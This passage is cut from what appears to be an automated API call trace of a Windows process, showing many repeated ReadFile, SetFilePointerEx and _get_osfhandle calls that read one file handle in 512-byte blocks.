nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, 